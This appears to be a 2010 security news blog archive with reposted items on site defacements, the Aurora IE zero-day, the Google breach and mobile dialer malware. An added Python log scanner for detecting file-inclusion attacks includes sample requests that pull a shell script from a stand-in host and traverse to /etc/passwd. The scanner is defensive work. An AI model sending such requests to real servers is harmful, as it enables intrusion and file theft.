Monthly Archives: January 2010

TechCrunch compromised, defaced

Filed under Hacks

Popular technology site TechCrunch was hit by potty-mouth hackers late on Monday, leaving the site temporarily unavailable.

A notice on TechCrunch.com’s front page on Tuesday morning explains that “TechCrunch.com was compromised by a security exploit”. Access to the site’s story archive has been suspended, leaving a two-paragraph notice on the hack as the only content visible on the site.

Hackers defaced the front page of the site with a message (recorded by Mikko Hypponen of F-Secure) apparently abusing site admins and including a link to a website hosting pornographic content and warez links.

This defacement was removed by site admins who are in the process of identifying the exploit involved in the hack, securing systems, and bringing TechCrunch back online.

The motives or perpetrators of the attack remain unclear but the timing – a day before Apple’s much anticipated iTab launch in San Francisco – could hardly be worse.

Source: The Register

Hundreds of Network Solutions Sites Hacked

Filed under Hacks

Web site domain registrar and hosting provider Network Solutions acknowledged Tuesday that hackers had broken into its servers and defaced hundreds of customer Web sites.

The hackers appear to have replaced each site’s home page with anti-Israeli sentiments and pictures of masked militants armed with rocket launchers and rifles, along with the message “HaCKed by CWkomando.”

According to results for that search term entered into Microsoft’s Bing search engine, there may in fact be thousands of sites affected by this mass defacement.

One of the defaced pages belonged to Minnesota’s 8th District GOP, according to a story in The Minnesota Independent, which said the Arabic writing that accompanies the defaced pages contains the dedication “For Palestine,” and the repeated phrase “Allahu Akbar” [God is great].

Network Solutions said the hackers were able to get in by exploiting a “file-inclusion” weakness in the company’s Unix servers. So-called remote file inclusion attacks are quite common, and can let attackers insert code that gives them backdoor access to and control over the affected server. Network Solutions said it is in the process of helping customers restore their sites.
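As an added illustration (not from the original post and not Network Solutions’ code), a Python check that flags requests shaped like file-inclusion attempts in web-server access logs: parameter values that are absolute remote URLs, and, going beyond the remote case the post describes, values carrying directory traversal toward local files. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined style); hosts and IPs are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jan/2010:22:14:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Jan/2010:22:14:09 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.8"
203.0.113.9 - - [19/Jan/2010:22:15:41 +0000] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 404 210 "-" "curl/7.19"
198.51.100.7 - - [19/Jan/2010:22:16:02 +0000] "GET /index.php?page=ftp%3A%2F%2Fevil.example%2Fx.txt HTTP/1.1" 200 790 "-" "libwww-perl/5.8"
203.0.113.5 - - [19/Jan/2010:22:17:10 +0000] "GET /search.php?q=http+server+tuning HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
"""

# Fields we need from each line: client IP, request target, response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# An absolute URL on a fetchable scheme is the remote-inclusion shape; "../" is the local one.
REMOTE_SCHEME = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def classify_request(target):
    """Return (param, reason) findings for one request target, empty if clean."""
    findings = []
    # parse_qs percent-decodes values, so an encoded "ftp%3A%2F%2F" is caught too.
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            if REMOTE_SCHEME.match(value):
                findings.append((name, "remote-url"))
            elif TRAVERSAL.search(value):
                findings.append((name, "path-traversal"))
    return findings


def scan_log(text):
    """Return (ip, status, param, reason, target) for each suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, reason in classify_request(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), param, reason, m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, status, param, reason, target in scan_log(SAMPLE_LOG):
        # A 200 on a remote-url hit deserves the first look: the include may have executed.
        print(f"{ip} {status} {reason:<14} {param}= in {target}")
```

A hit only shows that the request had the attack shape; whether the server actually included the file depends on the application, so pair this with the response status and the application’s own logs.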

“These incidents are regrettable and we apologize for the inconvenience,” the company said in its statement. “Due to the nature of the web, the race between technology and the bad elements is a challenge that companies face continually.”

Network Solutions said there was no danger to customers’ “personally identifiable or secure information” as a result of the incident. Other recent break-ins at NetSol have not been so benign: Last summer, hackers broke into a number of Network Solutions Web servers and planted rogue code that resulted in the compromise of more than 573,000 debit and credit card accounts.

Source: Krebs on Security

Microsoft: Emergency IE Patch Coming

Filed under Patches, exploit

Microsoft has started dropping broad hints that an emergency patch for Internet Explorer will be released very soon to counter targeted attacks and the publication of exploit code for a “browse and you’re owned” vulnerability in its flagship Web browser.

The out-of-band update will be released once the company is satisfied that it has been properly tested against all affected versions of Windows. This could happen as early as this weekend.

The decision to ship the IE patch outside of Microsoft’s scheduled Patch Tuesday releases follows the release of exploit code into the Metasploit attack tool.

The Metasploit code only works against Internet Explorer 6, but there are claims in the security research community that the vulnerability has been successfully exploited on IE7 (on Windows Vista) as well as on IE6 and on Windows XP.

The vulnerability was discovered during zero-day attacks against several big-name U.S. companies, including Google, Adobe and Juniper Networks. During those attacks, data-stealing malware exploited the flaw against systems running IE6 on Windows XP.

Microsoft says the ongoing attacks remain “targeted to a very limited number of corporations” and are only effective against Internet Explorer 6. However, with the exploit code now in Metasploit, malware purveyors could begin tinkering with exploits geared to newer versions of the browser.

Now, Microsoft is imploring its customers to upgrade immediately to IE8. A special guidance page has been published to offer information on how to mitigate this vulnerability and avoid attacks.

Microsoft’s Security Research & Defense team has created and released a one-click “Fix It” tool to allow users to enable DEP (Data Execution Prevention) on older versions of the browser. DEP, a crucial anti-exploit mitigation, is enabled by default on IE8 only.

Source: ThreatPost

Hack of Adobe Conducted Via Zero-Day IE Flaw

Filed under Hacks, Zero Day, exploit

The recent hack attack on Adobe occurred through exploitation of a zero-day vulnerability that affects all versions of Internet Explorer, according to a security researcher with a leading anti-virus firm.

Microsoft learned about the vulnerability only Wednesday evening and is planning to release an announcement about the vulnerability later today, said the researcher, who asked not to be identified because he’s not authorized to speak with the press.

The vulnerability, for which there is currently no patch, is a memory corruption flaw that causes the browser to internally misfire in a way that allows the hacker to inject malware on the user’s computer.

“It’s pretty targeted so the reality is that it’s only currently being used against these targeted companies,” the researcher said. He couldn’t say how many of the other 33 companies hit in the hack attack were breached in this way.

Zero day vulnerabilities are security flaws in software for which there is currently no patch. Researchers discovered a memory corruption flaw in IE in December, which Microsoft patched on Dec. 9. The researcher, however, said the one that affected Adobe is believed to be a new and different one.

Google announced on Tuesday that it had been the target of a “highly sophisticated” and coordinated hack attack against its corporate network, and that the hackers had stolen intellectual property and sought access to the Gmail accounts of human rights activists.

Minutes later, Adobe acknowledged in a blog post that it discovered Jan. 2 that it had been the target of a “sophisticated, coordinated attack against corporate network systems managed by Adobe and other companies.”

Neither Google nor Adobe provided details about how the hacks occurred.

Full article at: Threat Level

Trojan pr0n dialers make comeback on mobile phones

Filed under Malware, Viruses

After taking a long hiatus, trojan dialers that can rack up thousands of dollars in charges are back by popular demand.

According to researchers at CA Security’s malware analysis lab, a new wave of malicious dialers is hitting users of mobile phones. The trojans are built on the Java 2 Micro Edition programming language and cause infected handsets to send SMS messages to high-cost numbers, at great expense to the victim.

“As soon as the application is loaded, this malicious software starts to send premium text messages,” CA warned on Tuesday. “The messages sent out are in the typical format to invoke premium services and land the mobile user with heavy mobile bills without the user’s knowledge and consent.”

Malware that automatically dials pricey premium numbers was all the rage a decade ago, when dial-up internet services required computers to connect to a phone line. With the growth of broadband connections the frequency of dialers waned.

The explosion of smart phones that can run software made by anyone has given malicious dialers a new lease on life. And as was the case in the days of yore, they mostly tap into porn services.

Source: The Register

GMail Goes “https-only” By Default

Filed under Security

A day after confirming a major security breach by Chinese hackers looking for GMail account information, Google has turned on default “https:” access for its popular Web mail service.

Google had previously added the option for GMail users to “always use https” back in July 2008 but it was turned off by default.

Last June, a group of researchers and academics released an open letter calling on Google to protect users’ communications from theft and snooping by enabling industry-standard transport encryption (HTTPS) for Google Mail, Docs, and Calendar.

Now comes word that this is indeed happening:

“We are currently rolling out default https for everyone. If you’ve previously set your own https preference from Gmail Settings, nothing will change for your account. If you trust the security of your network and don’t want default https turned on for performance reasons, you can turn it off at any time by choosing “Don’t always use https” from the Settings menu. Gmail will still always encrypt the login page to protect your password. Google Apps users whose admins have not already defaulted their entire domains to https will have the same option.”

Source: ThreatPost

Twitter plans new products and tighter security

Filed under Security

Twitter has announced plans to hire 27 professionals to create new products and improve the security of the site.

The increase in headcount is a significant move for the relatively small company, which currently has around 120 staff.

Twitter co-founder Biz Stone stated in November that 2010 will be the “revenue year” for the company, and the variety of job postings currently hosted on the micro-blogging site suggests that he is not digressing from this strategy.

The new employees will focus on creating Twitter front-end features, and should have experience in advertising applications, in line with the firm’s new advertising strategy scheduled to be rolled out this year.

Twitter is also issuing calls for a professional who will maintain a platform to help developers in media companies create new integrations with Twitter, as well as for another employee who will encourage media professionals to use the tools.

The other job descriptions display Twitter’s plans to increase the support tools available to users, further develop its application programming interface, develop Twitter’s international front-end and add new search capabilities.

A product marketing manager is also wanted to enhance business users’ understanding of the value of Twitter. According to the description, the work can range from creating “better packaging [of] existing features for businesses, managing all outbound marketing for new monetisation products, [and] analysing customer needs for improved product development”.

Finally, Twitter wants to increase its security team after a number of safety issues hit the headlines last year. The most recent incident involved hackers logging in to Twitter and redirecting users to a site hosted by a group calling itself the ‘Iranian Cyber Army’.

A network and infrastructure security manager will audit and secure systems and create procedures that respond to security issues. The job will involve designing a system that will prevent network intrusions. Meanwhile, an anti-spam software engineer will focus on Twitter’s spam detection system.

Source: v3.co.uk

Cybercriminals target school districts

Filed under Hacks

Local school districts across the United States have emerged as a prime target for cybercriminals. In the fall of 2009, districts in Colorado, Illinois, Oklahoma and Pennsylvania all reported thefts of tens of thousands of dollars.

The threat continues: on January 5, 2010, the Duanesburg, New York Central School District disclosed an attempted theft of $3.8 million, about a quarter of the district’s operating budget.

These crimes have been driven by malicious software infecting central-office PCs containing the district’s electronic banking details. These details were subsequently used by cybercriminals to access the district’s online bank account and illegally transfer money out of the account to money mules, who in turn transfer the funds to the criminal ringleaders.

Comodo CEO Melih Abdulhayoglu points out the soft-target characteristics of school districts and similar organizations, including local governments, not-for-profit organizations, and small businesses, that make them attractive to cybercriminals. Abdulhayoglu further points out the need for much stronger “Default Deny” PC endpoint security to be deployed by organizations that will always appear to be soft targets relative to larger organizations with the personnel and financial resources to mount stronger cyber-defenses.

Source: Help Net Security

Adobe releases patch for critical Acrobat and Reader flaw

Filed under Patches, Software

Adobe has released a patch for multiple vulnerabilities in its Acrobat and Reader products. This patch addresses the widely used exploit that was released into the wild last month. Exploiting these vulnerabilities may allow an attacker to execute code or perform a denial of service attack.

Adobe Security Bulletin

Google announces data breach, will stop censoring in China (if they stay at all)

Filed under Hacks

The big news today regarding Google is its announcement on its blog that it was a target of a highly focused attack on its corporate infrastructure.

Google’s statement:

“First, this attack was not just on Google. As part of our investigation we have discovered that at least twenty other large companies from a wide range of businesses–including the Internet, finance, technology, media and chemical sectors–have been similarly targeted. We are currently in the process of notifying those companies, and we are also working with the relevant U.S. authorities.

Second, we have evidence to suggest that a primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists. Based on our investigation to date we believe their attack did not achieve that objective. Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.

Third, as part of this investigation but independent of the attack on Google, we have discovered that the accounts of dozens of U.S.-, China- and Europe-based Gmail users who are advocates of human rights in China appear to have been routinely accessed by third parties. These accounts have not been accessed through any security breach at Google, but most likely via phishing scams or malware placed on the users’ computers.”

Google has announced that it will stop filtering search results in China. This is a bold move for Google, and a reversal of past practices. Google has come under fire from freedom advocates in recent years due to its cooperation with the Chinese government in censoring search results for users in China.

This move indicates that Google possibly considers the attacks to have been authorized by the Chinese government, or that they were performed by government sympathizers.

Additionally, Google has announced that if conditions in China continue to be non-conducive to business, it will consider pulling out of China completely.